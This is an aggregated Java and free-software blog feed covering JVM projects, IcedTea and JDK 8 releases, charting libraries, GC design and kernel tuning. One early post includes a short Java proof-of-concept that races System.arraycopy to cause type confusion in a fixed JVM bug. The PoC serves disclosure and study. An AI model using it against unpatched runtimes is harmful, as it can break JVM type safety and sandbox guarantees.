Planet Classpath

Jainja is a JVM (Java Virtual Machine) written in Java. The focus is on portability, not on performance. Jainja supports Java 1.5 features.

This release adds support for Minix, Haiku and Dart.

So Jainja currently works on Linux, Windows, xBSD, Minix, Haiku, Java SE, Android, GWT, and Dart.

More info

 
I'm currently working on a new "platform" target for Jainja: Dart

I have some preliminary results, but only simple applications work at this stage.


Here is a simple PoC exploit for the issue fixed here; it races writes to arr1[0] against System.arraycopy so that, if the timing works out, a Union1 reference ends up stored in the Union2[] array:

class Union1 { }
class Union2 { }

class arraytoctou {
  static volatile Union1 u1 = new Union1();

  public static void main(String[] args) {
    final Union1[] arr1 = new Union1[1];
    final Union2[] arr2 = new Union2[1];
    // Copier thread: keeps trying to copy from the Union1[] into the Union2[],
    // and stops once an element actually lands in arr2.
    new Thread() {
      public void run() {
        for(;;) {
          try {
            System.arraycopy(arr1, 0, arr2, 0, 1);
            if (arr2[0] != null) break;
          } catch (Exception ignored) { }
        }
      }
    }.start();

    // Main thread: races the copier by flipping arr1[0] between null and a
    // Union1, hoping the element changes between arraycopy's check and the copy.
    while (arr2[0] == null) {
      arr1[0] = null;
      arr1[0] = u1;
    }

    // If the race is won, a Union1 instance is now stored in a Union2[]:
    // type confusion.
    System.out.println(arr2[0]);
  }
}

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative virtual machines and architectures beyond those supported by OpenJDK.

This release updates our OpenJDK 7 support in the 2.4.x series with the April 2014 security fixes.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below.

What’s New?

New in release 2.4.7 (2014-04-15)

The tarballs can be downloaded from:

We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so.

The tarballs are accompanied by digital signatures available at:

These are produced using my public key. See details below.

SHA256 checksums:

  • 754350cbd704b22b7ba3d14c8283eb2d896d137824f95a9e6a2b34678658ade1 icedtea-2.4.7.tar.gz
  • 92a1ac08f3bdb1f0bca58a6528020ca0d7e7e720ad438743133de9d0b3bf875d icedtea-2.4.7.tar.gz.sig
  • b66973bef7808f8fb03be64e44d312ea2d13590a68a6a4e6690dbcdd1947459d icedtea-2.4.7.tar.xz
  • 6766d3fcd0e2b7c167bcb217e2a7c03b6582b84b5a246d71601b5d7863c60ba7 icedtea-2.4.7.tar.xz.sig

The checksums can be downloaded from:

A 2.4.7 ebuild for Gentoo is available, along with a 2.4.7 source RPM.

The following people helped with these releases:

We would also like to thank the bug reporters and testers!

To get started:

$ tar xzf icedtea-2.4.7.tar.gz

or:

$ tar x -I xz -f icedtea-2.4.7.tar.xz

then:

$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea-2.4.7/configure
$ make

Full build requirements and instructions are available in the INSTALL file.

Happy hacking!

The IcedTea project provides a harness to build the source code from OpenJDK using Free Software build tools, along with additional features such as a PulseAudio sound driver, the ability to build against system libraries and support for alternative virtual machines and architectures beyond those supported by OpenJDK.

This release updates our OpenJDK 6 support in the 1.13.x series with the April 2014 security fixes.

If you find an issue with the release, please report it to our bug database under the appropriate component. Development discussion takes place on the distro-pkg-dev OpenJDK mailing list and patches are always welcome.

Full details of the release can be found below.

What’s New?

New in release 1.13.3 (2014-04-15)

The tarballs can be downloaded from:

We provide both gzip and xz tarballs, so that those who are able to make use of the smaller tarball produced by xz may do so.

The tarballs are accompanied by digital signatures available at:

These are produced using my public key. See details below.

SHA256 checksums:

  • 15a5a9b4ff52f67a3dffd264e75d6f984bc196f47899376c206b1e51000fd072 icedtea6-1.13.3.tar.gz
  • 00e7f7083fa907b9a39dfbae1a5461afe741d0cbf80456c8dbcefa37fa8f14da icedtea6-1.13.3.tar.gz.sig
  • 0149ffffcfb55739357a2c720421cbc311e4ccb248c0c185ed67671d2c45f748 icedtea6-1.13.3.tar.xz
  • a36f43665bfcfe0e03ae08507a7db7a09892f14cc9defe345ad344134cc3c17c icedtea6-1.13.3.tar.xz.sig

The checksums can be downloaded from:

A 1.13.3 ebuild for Gentoo is available.

The following people helped with these releases:

We would also like to thank the bug reporters and testers!

To get started:

$ tar xzf icedtea6-1.13.3.tar.gz

or:

$ tar x -I xz -f icedtea6-1.13.3.tar.xz

then:

$ mkdir icedtea-build
$ cd icedtea-build
$ ../icedtea6-1.13.3/configure
$ make

Full build requirements and instructions are available in the INSTALL file.

Happy hacking!

Lots of new stuff in OresmeKit, the graphing toolkit for GNUstep and Mac! As an example, here is an advanced dashboard based on DataBasin that displays the system load of Salesforce.com. It is not generally available yet, but I hope it will be!

Grid sizing is now selectable, so the grid can be spaced at 1K or 1M intervals (depending on the available data range), as used in both screenshots in this example.

 - (void)setYAxisGridSizing:(OKGridSizing)sizing;

Can take now: OKGridConstantSize, OKGridKiloMega

Also, one can decide to draw just the labels of the minimum and maximum values, or a label for every grid line:

- (void)setYAxisLabelStyle:(OKLabelStyle)style;

Can take:  OKNoLabels, OKMinMaxLabels, OKAllLabels

1000-unit Grid



To complement this kind of visualization, a new kind of label formatting can be used. In the example above the numbers are plain: 10.000 is written as such. In the example below it is formatted as 10K; if we were using 10.000.000, it would be 10M.

1000 - grid with K formatting

I'll be joining my colleagues in the Oracle office in Hamburg to chat about development and other roles within a large IT company as part of the Girls' Day in Germany.

Fiorenza Sofia :)

On the 19th of March the most wonderful and happiest event of my life happened: my daughter was born :) at 17:16, in Karlsruhe.

Just in time for Father’s Day, which falls exactly on the 19th of March in Italy (not in Germany, so I can celebrate twice ;)

Everybody said that being a father is a life-changing event. While I had started to understand that over the past 9 months, I don’t think I was really prepared to fully appreciate what it means. In fact, Roman told me that you have 9 months to prepare, and you inevitably arrive unprepared to this appointment!

Indeed, it is really beyond description, but I feel so proud and happy, and scared; all the feelings are mixed up… but above all I feel full of love. It is so wonderful to look at her smiling (and she does smile a lot!); a warm sense of calm and peace and happiness spreads all around, the air is pregnant with it! Everyone should experience this feeling at least once; the world would be so much a better place, I think.

Anyway, it’s time to go and look at her now; she grows so fast and I don’t want to miss even a minute of her life!


Oracle today announced the availability of JDK 8, a production-ready implementation of the Java SE 8 Platform Specification, which was recently approved through the Java Community Process (JCP). This release includes the largest upgrade to the Java programming model since the platform was introduced in 1996. JDK 8 was developed collaboratively in the OpenJDK Community.


The Java SE 8 release is the result of industry-wide development involving open review, weekly builds and extensive collaboration between Oracle engineers and members of the worldwide Java developer community via the OpenJDK Community and the JCP.


"The release of Java SE 8 demonstrates the innovation driven by the ongoing collaboration between IBM, Oracle and other members of the Java community in OpenJDK," said John Duimovich, Distinguished Engineer, IBM. "Java SE 8 provides enterprise customers with significant gains in productivity, scalability and maintainability, and further demonstrates that they can continue to rely on Java to grow their business."


Taken from an Oracle press release titled Oracle Announces Java 8.

That brings the total count up to 18 press releases from Oracle mentioning OpenJDK.

The first release candidate is available. It can be downloaded here or from NuGet.

What's New (relative to IKVM.NET 7.3):

  • Merged OpenJDK 7u40 b34.
  • Many bug fixes.
  • Optimizations to reduce metadata size.
  • Added support for getting package information from the right jar manifest for ikvmc compiled jars.
  • Improved runtime support for running on platforms without Reflection.Emit.
  • Removed IKVM.Attributes.HideFromReflectionAttribute.
  • IKVM.Reflection: Many improvements and fixes.
  • IKVM.Reflection: WinMD projection support.

Changes since previous development snapshot:

  • IKVM.Reflection: Fix for Type.GetInterfaceMap() issue.

Binaries available here: ikvmbin-7.4.5196.0.zip

Sources: ikvmsrc-7.4.5196.0.zip, openjdk-7u40-b34-stripped.zip

Two years, seven months, and eighteen days after the release of JDK 7, production-ready builds of JDK 8 are now available for download!

Thanks! A major new release of a software system as large as the JDK is the direct work of many hundreds of developers, with indirect contributions from thousands more. By way of thanks I’d like to mention the major contributors here specifically:

Many smaller—but no less important—contributions were made via the JEP Process and in other ways by many other developers, including (but not limited to!) the following: Niclas Adlertz, Lance Andersen, Sundar Athijegannathan, Jaroslav Bachorik, Joel Borggrén-Franck, Andrew Brygin, Brian Burkhalter, Rickard Bäckman, Sergey Bylokhov, Suchen Chien, Brent Christian, Iris Clark, Sean Coffey, John Coomes, John Cuthbertson, Joe Darcy, Dan Daugherty, Mike Duigou, Xue-Lei Fan, Michael Fang, Robert Field, Daniel Fuchs, Mikael Gerdin, Jennifer Godinez, Zhengyu Gu, Kurchi Hazra, Chris Hegarty, Erik Helin, David Holmes, Vladimir Ivanov, Henry Jen, Yuka Kamiya, Karen Kinnear, Vladimir Kozlov, Marcus Lagergren, Jan Lahoda, Staffan Larsen, Doug Lea, Sergey Malenkov, Stuart Marks, Eric McCorkle, Keith McGuigan, Rob McKenna, Michael McMahon, Morris Meyer, Sean Mullan, Alejandro Murillo, Kelly O’Hair, Frederic Parain, Bhavesh Patel, Petr Pchelko, Oleg Pekhovskiy, Valerie Peng, Anthony Petrov, Pavel Porvatov, Tony Printezis, Joe Provino, Yumin Qi, Phil Race, Tom Rodriguez, Leonid Romanov, Vicente Romero, John Rose, Bengt Rutisson, Vinnie Ryan, Abhijit Saha, Dmitry Samersoff, Paul Sandoz, Naoto Sato, Thomas Schatzl, Alexander Scherbatiy, Harold Seigel, Konstantin Shefov, Xueming Shen, Serguei Spitsyn, Kumar Srinivasan, Lana Steuck, Attila Szegedi, Christian Thalinger, Igor Veresov, Hannes Wallnöfer, Joe Wang, Max Wang, Roland Westrelin, Brad Wetmore, Jesper Wilhelmsson, Hinkmond Wong, Dan Xu, Jiangli Zhou, and Alexander Zuev.

More than code: contributions of reviews, tests, and test results are just as important as contributions of code. Oracle’s internal quality and performance teams did their usual thorough job, and feedback from the wider Java community was equally valuable.

Over 400 of the more than 8,000 bug and enhancement issues addressed in JDK 8 were reported externally. These reports came in throughout the release cycle, enabled by our regular posting of weekly builds, but naturally the rate increased after we posted the Developer Preview build in September. The following early testers who submitted significant bug reports deserve special mention:

Valuable reports continued to come in after we posted the first Release Candidate build in early February. Of the small number of bugs fixed after that build, two were reported externally: a serious signature bug in the lambdafication of the Comparator API, and a nasty correctness bug in the implementation of default methods.
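The post doesn’t detail the Comparator bug itself, but for readers unfamiliar with what “lambdafication of the Comparator API” refers to, here is a minimal sketch (my own illustration, not taken from the release) of the comparator factory methods that shipped in the final JDK 8:

import java.util.Arrays;
import java.util.Comparator;
import java.util.List;

public class ComparatorDemo {
    public static void main(String[] args) {
        List<String> names = Arrays.asList("Duke", "Ada", "Linus");
        // Comparator.comparing and thenComparing are the new "lambdafied" factories;
        // the sort key is supplied as a method reference.
        names.sort(Comparator.comparing(String::length)
                             .thenComparing(Comparator.naturalOrder()));
        System.out.println(names); // [Ada, Duke, Linus]
    }
}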

Launch! I’ll host the official Java 8 Launch Webcast at 17:00 UTC next Tuesday, 25 March. Join me for an open question-and-answer session with a panel of key Java 8 architects, and to hear from a number of other special guests, by signing up here.

I just released a new version of Orson Charts, a 3D chart library for the Java platform. Version 1.2 contains significant new features driven by customer requirements:
  • logarithmic axis support;
  • value and range markers for all numerical axes (to match a similar feature in JFreeChart);
  • localisation support (with German and Italian localisations initially);
  • improved axis labelling with new tick label orientation options plus "stepped" labelling for category axes;
  • chart theme support, with some built-in themes plus the ability to create your own;
  • a JPEG export option (to add to the existing PNG, PDF and SVG export options).

In this release, we've also made efficiency improvements in the rendering engine and fixed a number of bugs that have been identified by clients and through our own testing (the recent exercise of creating the Orson Charts for HTML5 port uncovered a few issues, for example).

I can't have a blog post without a few screenshots so first up here is an example of the logarithmic axis (on the y-axis here, but it is possible to use a log scale on any numerical axis):

ScatterPlot3DDemo2_2.png

Next up, an example showing the highlighting that can be done with the new marker feature (see that the categories "Apple" and "Q4/12" have been highlighted, plus the bar is rendered in red to draw attention to that particular data value...Apple makes a *lot* of money, but you already knew that):

CategoryMarkerDemo1.png

Finally, some range markers on an XYZ plot to highlight particular ranges of values (and a custom color source to highlight those items that fall within the intersection of the three ranges). The most typical usage would be to show a range of y-values in some target range, but for demo purposes the example below adds a range marker to each axis:

RangeMarkerDemo1.png

Our focus for the next release is to continue improving the interactivity of the charts. While we are working on that, please go and download the free evaluation of Orson Charts 1.2 and send us your feedback.

Today I released version 1.5 of Orson PDF, a fast and small PDF generator for Java (it implements the Graphics2D API). I created this library last year because I wanted to provide export to PDF for both JFreeChart and Orson Charts, but without taking on a big external dependency:

popup_pdf.png

The Orson PDF jar file weighs in at less than 70kB (without using Pack200 or any other minimisation techniques). It doesn't support font embedding, but the latest release provides an option (enabled via rendering hints) to render text as vector graphics, which works pretty well when the amount of text is limited as is usually the case with charts.
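To show how a Graphics2D-based generator like this is typically driven, here is a rough sketch. The PDFDocument, Page, getGraphics2D and writeToFile names below are my assumptions from memory rather than something quoted from this post, so check the Orson PDF documentation for the exact API; the drawing calls themselves are plain java.awt.Graphics2D:

import java.awt.Color;
import java.awt.Graphics2D;
import java.awt.geom.Rectangle2D;
import java.io.File;
// Assumed Orson PDF entry points (package and class names from memory, unverified):
import com.orsonpdf.PDFDocument;
import com.orsonpdf.Page;

public class PdfSketch {
    public static void main(String[] args) {
        PDFDocument doc = new PDFDocument();
        // Page size in points; 612 x 468 is just an arbitrary example size.
        Page page = doc.createPage(new Rectangle2D.Double(0, 0, 612, 468));
        Graphics2D g2 = page.getGraphics2D(); // an ordinary java.awt.Graphics2D
        g2.setPaint(Color.BLUE);
        g2.draw(new Rectangle2D.Double(10, 10, 200, 100));
        g2.drawString("Hello, PDF", 20, 130);
        doc.writeToFile(new File("out.pdf"));
    }
}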

If you are working with Java2D, you should also check out JFreeSVG, I released a new version of that library last week. It does SVG generation via the Graphics2D API and is, like Orson PDF, very light-weight (around 48k for the jar file).

Tomorrow marks 2 years that I’ve been at Red Hat, and it has been a very exciting journey so far, at one of the most interesting and awesome companies around. I’m glad I’m here!

The only problem is that I started on the 29th of February, and tomorrow is actually the 1st of March… so I need to wait two more years before I can celebrate even the first anniversary… ouch ;) But at least I’ll be able to throw a very awesome party by then!


I have an ol' OmniBook 800CT. A small, interesting computer, and extremely advanced for its time!
Small form factor, but still a very nice keyboard, something unmatched on modern netbooks. The unique pop-out mouse. The series started out with a 386 processor, b&w display and ROM expansions.
The 800CT is one of the last models: same form factor and SCSI connector, but a color screen (800x600) and a hefty 133 MHz Pentium!
But only 32 MB of RAM (the kernel reports 31 MB real mem, 24 MB avail mem).

Original 5.4 kernel: 9.2M
Custom kernel: 5.0 M

This shrinkage is quite hefty: almost 50%! Beyond raw disk usage, the new kernel boots faster and leaves more free memory; enough that X11 is now almost usable.

How can this be achieved? Essentially by removing unused kernel options. If a driver is for hardware you don't have (and won't use, e.g. you know you won't plug in a certain card in the future), you configure it out: it won't be built and it won't end up in your kernel.
On an old laptop with no expansion except the ports and the PCMCIA port it has, this is relatively easy.

To build your custom kernel, follow the OpenBSD FAQ.

The main idea is to take the kernel configuration file, go over it line by line and check whether you have the corresponding hardware, which you can tell by checking your dmesg: dmesg shows which devices and drivers were loaded. Remember that you do not modify GENERIC, but a copy of it.

You can automate this with a tool called dmassage: it will parse your GENERIC configuration and produce an optimally tuned version. However, the result will not work out of the box.
Why? There are drivers which do not compile if other drivers are not present.

I'm unsure if this is really a bug; in my opinion it is at least "unclean" code. However, since this kind of extreme driver-picking is rarely done, it is not fatal and probably won't be fixed.

If you remove all drivers at once, you won't easily find out which one breaks, so my suggestion is to remove them in sets. One by one is surely too tedious, since each removal requires a build.
  1. remove X drivers
  2. build, if it works, copy the configuration file as a backup
  3. test the kernel, optionally, by booting it
  4. continue removal

Thus, in case of breakage, you can narrow it down to a smaller set of options.

If your machine doesn't have a certain bus, you may remove all drivers attached to it. But proceed from the leaves, not the trunk: gradually remove the peripheral drivers before removing the bus support.

In my case, I found that an unremovable driver is:
et*    at pci?                # Agere/LSI ET1310


Remember that you are running an unsupported kernel: if you need support for a problem, first try to reproduce it with the original kernel, of which you should in any case keep a backup copy during the iterative building process.

The JogAmp community held a Ji Gong freedom talk in front of the Free Java developer room audience, reminding people to exercise the four freedoms granted by free software licenses. The talk also proposed and showcased technical enhancements for High Availability JVM Technology on All Platforms.
Slides from the Ji Gong talk can be obtained at: https://jogamp.org/doc/fosdem2014/

During the same week JogAmp released version 2.1.4 of its high-performance Java OpenGL, audio & media processing libraries.
This release includes some new highlights:
* Android OpenCL test APKs. This enables you to compile and test an OpenCL JOCL application on the desktop and then deploy it on Android without using any OpenCL SDK for the phone; the JOCL binding will locate and bind the OpenCL drivers at runtime.
* Enable use of custom mouse pointers and window icons using the NEWT window and input toolkit.
* Multi-window support on the Raspberry Pi, including mouse-pointer use directly from the console!
Complete list of bugs resolved for this 2.1.4 release can be found at:
https://jogamp.org/wiki/index.php/SW_Tracking_Report_Objectives_for_the_release_2.1.4

Photos: panoramas of the Ji Gong JogAmp talk audience and of the JamVM/OpenJDK 8 talk, taken in the FOSDEM 2014 Free Java devroom.

Last weekend I talked about the Shenandoah GC at FOSDEM 2014 and announced the availability of the Shenandoah source code and project pages. Until Shenandoah becomes a proper OpenJDK project, it will be hosted on IcedTea servers. We currently have:

We also filed a JEP for Shenandoah, here you can find the announcement and discussion on hotspot-gc-dev.

If you are interested in the slides that I presented at FOSDEM, you can find them here.

Implementation-wise we’re making good progress. Concurrent evacuation is working well and support for the C1 compiler is almost done.


Monument to Mozillians

Last week in Mozilla’s San Francisco office, members of the DOM, WebAPI, Accessibility, Networking, JS, Security, Add-Ons, and Apps teams gathered for discussions, hacking, and some good old face time.

Productive sessions were held on many topics. I’ve highlighted a few here:

Documentation

Web Workers

Service Workers

(Incremental) Cycle Collection ((I)CC)

Do Not Track (DNT)

  • Monica led a discussion of how to make DNT more effective

Content Security Policy (CSP)

  • Discussed applying CSP to chrome resources
  • Decided on a direction that does not require reinventing the system principal: a new context data structure that includes a principal and other per-document state such as the CSP.

Referrer handling and ping

  • Reached consensus that we should help with site efficiency by providing a mechanism to strip referrer data on the client side (to avoid an additional RTT and redirect on the server)
  • Faster and more private for all
  • We will follow up with potentially reducing the amount of referrer data sent by default in Gecko.

Sandboxing and e10s (electrolysis)

  • We (mostly billm) presented the state of e10s and sandboxing on desktop and b2g, including instructions on how to test your things with e10s/sandbox enabled
  • General Q&A about the project architecture and current sticking points

Accessibility

  • Shared plan for e10s and accessibility
  • Lots of face-to-face hacking
  • Standards work

IPDL and PBackground

  • bent gave an overview of IPDL and PBackground in particular
  • we have video here and will clean it up for public consumption some time soon

Improving DOM performance

  • many options for improving DOM performance were discussed
  • the biggest thing needed is test cases
  • lots of action items from this session are in the raw etherpad notes (at bottom)

Apps and Marketplace requests

  • Harald and Vishy joined us to bring up some concerns and questions that have been voiced by the marketplace team and various partners

Networking (necko)

  • The networking team held 3 sessions: one to discuss improvements to the necko APIs (better off-main-thread support, providing a wrapper library with security checks built in, and upgrading to async file I/O were mentioned); one on ways that layout could better set network channel priority for faster loading of visible resources; and one to map out the API needed to support Service Workers. We also made a lot of progress designing off-main-thread websockets support.

Web Components

  • dglazkov from Google came by and participated in some good discussions about Web Components

Julien Wajsberg represented the Gaia team’s needs with a discussion of Haida, the upcoming Firefox OS UX.

Raw notes from the week with lots of links are available here: https://etherpad.mozilla.org/JSTJanWorkWeek

Occasionally I see questions about how to import gdb from the ordinary Python interpreter.  This turns out to be surprisingly easy to implement.

First, a detour into PIE and symbol visibility.

“PIE” stands for “Position Independent Executable”.  It uses essentially the same approach as a shared library, except it can be applied to the executable.  You can easily build a PIE by compiling the objects with the -fPIE flag, and then linking the resulting executable with -pie.  Normally PIEs are used as a security feature, but in our case we’re going to compile gdb this way so we can have Python dlopen it, following the usual Python approach: we install it as _gdb.so and add a module initialization function, init_gdb. (We actually name the module “_gdb“, because that is what the gdb C code creates; the “gdb” module itself is already plain Python that happens to “import _gdb“.)

Why install the PIE rather than make a true shared library?  It is just more convenient — it doesn’t require a lot of configure and Makefile hacking, and it doesn’t slow down the build by forcing us to link gdb against a new library.

Next, what about all those functions in gdb?  There are thousands of them… won’t they possibly cause conflicts at dlopen time?  Why yes… but that’s why we have symbol visibility.  Symbol visibility is an ELF feature that lets us hide all of gdb’s symbols from any dlopen caller.  In fact, I found out during this process that you can even hide main, as ld.so seems to ignore visibility bits for this function.

Making this work is as simple as adding -fvisibility=hidden to our CFLAGS, and then marking our Python module initialization function with __attribute__((visibility("default"))).  Two notes here.  First, it’s odd that “default” means “public”; just one of those mysterious details.  Second, Python’s PyMODINIT_FUNC macro ought to do this already, but it doesn’t; there’s a Python bug.

Those are the low-level mechanics.  At this point gdb is a library, albeit an unusual one that has a single entry point.  After this I needed a few tweaks to gdb’s startup process in order to make it work smoothly.  This too was no big deal.  Now I can write scripts from Python to do gdb things:

#!/usr/bin/python
import gdb
gdb.execute('file ./install/bin/gdb')
print 'sizeof = %d' % gdb.lookup_type('struct minimal_symbol').sizeof

Then:

$ python zz.py
72

Soon I’ll polish all the patches and submit this upstream.

Earlier in 2013 on a bit of a whim I bought a Raspberry Pi. I can’t remember if I had a good use case for it but in the end I decided to use it as an XBMC frontend. I put raspbmc on it and setup was incredibly easy (my media files are on my Synology 413j NAS).

I wanted to mount it to the back of my small TV so George Wright found me a thingiverse Raspberry Pi case with VESA mounting holes. I used the MakerBot that Toronto Mozillians pitched in and bought. The results are pretty nice:

Freshly-printed case

Case mounted on the back of my TV

Case mounted on the back of my TV with cover

JNode, the free operating system developed in Java, now has its own Twitter account. Follow #JNode!

GitHub is now the main repository for JNode sources: https://github.com/jnode. We are now using GitHub’s issue tracker.

The annotation processing API, both the processor-specific portion of the API in javax.annotation.processing and the language modeling portions in javax.lang.model.*, is being updated to support the new language features in Java SE 8. Procedurally, the proposed changes are covered by the second maintenance review of JSR 269: Maintenance Draft Review 2.

As summarized on the maintenance review page, there are three categories of changes from the version of the API shipped with Java SE 7:

  1. Cleaning up the existing specification without changing its semantics (adding missing javadoc tags, etc.)
  2. API changes to support the language changes being made in Project Lambda / JSR 335. These include adding javax.lang.model.type.IntersectionType as well as javax.lang.model.element.ExecutableElement.isDefault.
  3. API changes to support the language changes being made under JSR 308, Annotations on Java Types. These include javax.lang.model.AnnotatedConstruct and updating javax.annotation.processing.Processor.

The small repeating annotations language change, discussed on an OpenJDK alias, is also supported by the proposed changes.
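To make these additions concrete, here is a small, hypothetical processor sketch; the Marker/Markers annotations and the processor itself are invented for illustration and are not part of the JSR. It touches ExecutableElement.isDefault and the getAnnotationsByType method inherited from the new AnnotatedConstruct supertype:

import java.lang.annotation.Repeatable;
import java.util.Set;
import javax.annotation.processing.AbstractProcessor;
import javax.annotation.processing.RoundEnvironment;
import javax.annotation.processing.SupportedAnnotationTypes;
import javax.annotation.processing.SupportedSourceVersion;
import javax.lang.model.SourceVersion;
import javax.lang.model.element.Element;
import javax.lang.model.element.ExecutableElement;
import javax.lang.model.element.TypeElement;
import javax.lang.model.util.ElementFilter;
import javax.tools.Diagnostic;

// Made-up repeatable annotation pair, purely for illustration.
@Repeatable(Markers.class)
@interface Marker { String value(); }
@interface Markers { Marker[] value(); }

@SupportedAnnotationTypes("*")
@SupportedSourceVersion(SourceVersion.RELEASE_8)
public class MarkerProcessor extends AbstractProcessor {
    @Override
    public boolean process(Set<? extends TypeElement> annotations, RoundEnvironment roundEnv) {
        for (Element root : roundEnv.getRootElements()) {
            // getAnnotationsByType (from AnnotatedConstruct) "looks through" the
            // Markers container, supporting the repeating annotations feature.
            Marker[] markers = root.getAnnotationsByType(Marker.class);
            if (markers.length > 0) {
                processingEnv.getMessager().printMessage(Diagnostic.Kind.NOTE,
                    root + " carries " + markers.length + " @Marker annotation(s)", root);
            }
            // ExecutableElement.isDefault() is one of the Java SE 8 additions:
            // it reports whether an interface method is a default method.
            for (ExecutableElement m : ElementFilter.methodsIn(root.getEnclosedElements())) {
                if (m.isDefault()) {
                    processingEnv.getMessager().printMessage(Diagnostic.Kind.NOTE,
                        "default method: " + m.getSimpleName(), m);
                }
            }
        }
        return false;
    }
}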

A detailed specification difference is available. Please post any comments here or send them to me through email.

Late last night, fuelled by energy drinks for the first time since university, after a frantic hacking session to put out some fires discovered at the last minute, I prepared my first ever 1.0.0 release.  I wanted to share some retrospective thoughts about this.

It's worth mentioning that the project uses a slightly modified implementation of Semantic Versioning.  So 1.0.0 is a significant release: it indicates that the project is no longer in a beta status; rather, it's considered stable, mature even.  Any public API the project provides is considered frozen for the duration of the 1.X.X release train.  Any mistakes we have made (and I fully expect we'll discover plenty of them) in terms of interface design, we are stuck with for a while.  This part is a little bit frightening.

Oh, I should specify that the project is Thermostat, an open source Java monitoring tool.  Here's the release announcement from our announcement list archives.  My last post (woah, have I not posted anything since February?  Bad code monkey!!) also mentioned it.

Thermostat consists of a core platform including a plugin API, and ships with several useful plugins.  Leading up to this release, our focus has been primarily on the core platform and API.  Releasing 1.0.0 is somewhat exciting for us as we can move into primarily maintenance mode on the core, while building out new features as plugins.  Writing brand new code instead of lots of tweaking and refactoring of existing code?  Yes, please!

But what I really want to write about isn't the project itself, but the process and the things I learned along the way.  So, in no particular order:

Estimation is hard

This project was started by two engineers about two and a half years ago.  There was an early throwaway prototype, then a new prototype, which eventually became today's code base but looks nothing like it.  Over time things started to look more and more reasonable, and we started thinking about when we'd be releasing a 1.0 version.  I want to say that probably for more than a year, we've been saying "1.0 is around the corner".  And each time we said it, we believed it.  But we were, until recently, obviously wrong.  Now there are various reasons for this, some better than others.  In that time, there were new requirements identified that we decided we couldn't release 1.0 without implementing.  Naturally, estimates must be revised when new information appears.  But a lot of it is simply believing that some things would take significantly less time than they actually did.  I want to think that this is something that improves with experience, and will be mindful of this as we move into building out new features and/or when I'm one day working on a new project.

Early code and ideas will change

When I think back to the early days of this project, before it even had a name, it's hard to imagine.  This is because it is so incredibly different from where we ended up.  Some parts of our design were pretty much turned inside out and backwards.  Entire subsystems have been rewritten multiple times.  We've used and abandoned multiple build systems.  And this trend doesn't seem to be slowing down; we've had ideas brewing for months about changes targeting the 2.X release train that will change the picture of Thermostat in significant ways again.  One really awesome result of this is that nobody working on the project can afford to indulge their ego; any code is a rewrite candidate if there is a good reason for it, no matter who wrote it originally or how elegantly.  And everyone understands this.  Nobody gets attached to one implementation, one design.  It's nice to be working in a meritocratic environment.  It's a sort of freedom: freedom from attachments, and freedom to innovate.

Good test coverage helps make changes safe

So this one is something that's probably been noted by a lot of developers.  I know I've been taught this in school, read it in various places, and so forth.  But it is working on Thermostat that has really driven it home for me.  In the early days, we didn't really have any tests.  It made sense at the time; we didn't really know where we were going, the code base was small and undergoing radical changes very regularly.  But time went on, and it became clear that this project was going to be around for a while, and both the code base and the group of contributors were growing.  So, we started adding tests.  Lots and lots of tests.  No new code was accepted without tests, and over time we filled in gaps in coverage for pre-existing code.  The happy result has been an ability to make very invasive changes with the confidence that side effects will be minimal, and likely detected at test time.  I cannot exaggerate the number of times I've been thankful we put in the effort to get our unit and integration tests to this level.

Automation is king

Have a repetitive, error-prone task?  Script that.  Over time Thermostat has grown a collection of useful little helper scripts that save contributors time and effort, over and over again.  From firing up typical debug deployments, to release management tasks, to finding source files with missing license headers: we write this stuff once and use it forever.  These types of things go into version control of course, so that all developers can benefit from them.  Also, testing automation.  The common term used is of course Continuous Integration Testing, and for ages we've been using a Jenkins instance to run tests in sort of a clean room environment, catching problems that may have been hidden by something in a developer's environment.  This has saved us a lot of pain, letting us know about issues within hours of a commit, rather than discovering them by accident days, weeks, or months later and having to wonder what caused the regression.  I'll have to insist on a similar set up for any non-trivial project I work on.

That's all I have to say.  Hopefully it won't be so long before my next post.  I've actually been meaning to make a "battle station" write-up; I'm a remote employee, and invested time and money in a convertible standing desk setup and some clever mounting techniques to keep my workspace neat despite the number of devices involved.  Until then, Adieu!

If you’re debugging an application that loads thousands of shared libraries then be sure to read the LinkerInterface page on the GDB wiki.

I haven’t written about Shenandoah in a while. We first needed to clear up some issues around it, which is done now. The project is not dead, quite the contrary: we’re working feverishly. Just now, we are about to get concurrent evacuation to work :-)

Last time I wrote about concurrent marking. Before I carry on, I want to introduce a new concept: Brooks pointers. The idea is that each object on the heap has one additional reference field. This field either points to the object itself, or, as soon as the object gets copied to a new location, to that new location. This will enable us to evacuate objects concurrently with mutator threads (how exactly this is done is a topic for a separate post).

One problem of course is that as soon as we have two copies of an object (one in from-space, one in to-space), we need to be careful to maintain consistency. This means that any changes to objects must happen in the to-space copy. This is achieved by putting barriers in various places (everything that writes to objects, or runtime code that uses objects) that resolve the object before writing into it or using it. If we don’t do that, we might end up with some threads using the old copy, and some threads using the new copy, which is, obviously, a problem. The barrier simply reads the Brooks pointer field and returns the forwarded object to any code that uses it. In terms of machine code instructions, this means one additional read instruction for each write operation into the heap (and some read operations by the runtime). In fact, we currently need two instructions, the reason for which I’ll explain later.
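As a rough illustration of the barrier idea, here is plain Java pseudocode of my own; the real thing is emitted by the interpreter and JIT as machine instructions, not written like this:

// Every object conceptually carries a forwarding ("Brooks") pointer that points
// to itself until the object is evacuated, and to the to-space copy afterwards.
final class ForwardedObject {
    ForwardedObject forwardee = this;      // the Brooks pointer
    Object[] fields = new Object[8];       // stand-in for the object's ordinary fields

    // Read barrier: one extra load to follow the forwarding pointer.
    static ForwardedObject resolve(ForwardedObject obj) {
        return obj.forwardee;
    }

    // Write barrier: always resolve first, so every write lands in the
    // to-space copy and the two copies cannot diverge.
    static void writeField(ForwardedObject obj, int index, Object value) {
        resolve(obj).fields[index] = value;
    }
}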

Eventually, when evacuation is done, we need to somehow update all references to objects to point to the to-space locations. We do that by piggy-backing on the concurrent marking phase. When we traverse the heap for marking, we see all live objects and references, and whenever we visit an object, we update all its object references to point to the new locations of the referents.

There are two tradeoffs with using Brooks pointers: we need more heap space (ideally, one word per object), and we need more instructions to read and write objects.

Next time, I’ll start explaining how concurrent evacuation works.

